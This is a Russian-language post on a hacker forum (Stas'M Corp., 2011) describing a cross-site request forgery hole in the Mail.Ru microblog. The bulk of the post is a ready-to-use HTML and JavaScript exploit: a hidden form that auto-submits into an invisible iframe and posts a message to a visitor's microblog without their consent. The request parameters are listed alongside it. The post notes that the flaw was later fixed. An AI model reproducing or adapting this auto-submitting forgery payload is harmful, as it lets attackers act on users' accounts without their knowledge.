Stas'M Corp.
Главная | XSRF уязвимость в микроблоге (не актуально) - Форум | Регистрация | Вход
 
Четверг, 23.11.2017, 16:08
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 54.224.121.67
Браузер: Неизвестен
Основные разделы
Мини-чат
Loading Загрузка сообщений...
Наш опрос
На данный момент в разработке несколько проектов. Какие бы вы хотели увидеть в первую очередь?
Всего ответов: 342
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Administrator, Phantom, b@bskEnízm 
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
XSRF уязвимость в микроблоге (не актуально)
AdministratorДата: Понедельник, 30.05.2011, 17:26 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 89
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему отправить в микроблог пользователя любое сообщение.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса (старый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", ""]
mna0
mnb-1
_<пустое>

Образец запроса (новый вариант):

URL:http://my.mail.ru/cgi-bin/my/ajax
Метод:POST
Кодировка:UTF-8
Поля формы:
ajax_call1
func_namemicropost.send
data["Текст сообщения", {"type": "micropost"}]
mna0
mnb-1
_<пустое>

Образец HTML кода, использующего эту уязвимость:

Code
<form id="send_micropost" method="POST" action="http://my.mail.ru/cgi-bin/my/ajax" target="frame_micropost">
<input type="hidden" name="ajax_call" value="1">
<input type="hidden" name="func_name" value="micropost.send">
<input type="hidden" name="data" id="message_sending">
<input type="hidden" name="mna" value="0">
<input type="hidden" name="mnb" value="-1">
<input type="hidden" name="_" value="">
<input type="submit" value="Submit">
</form>
<script type="text/javascript">
document.getElementById('message_sending').value = "[\"Текст сообщения\", \"\"]";
document.getElementById('send_micropost').submit();
</script>
<iframe name="frame_micropost" width="0" height="0" scrolling="no" frameborder="0"></iframe>

К сожалению, эту уязвимость недавно исправили.


Stas'M
 
Форум » Хакерский форум » Mail.Ru » XSRF уязвимость в микроблоге (не актуально)
Страница 1 из 11
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferR303537803958
WMWebMoney transferB345247247920
Reg.ruReg.ru transfer9900126333
WUWestern Union transferuse feedback form
BTCBitcoin transferuse feedback form
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2017Хостинг от uCoz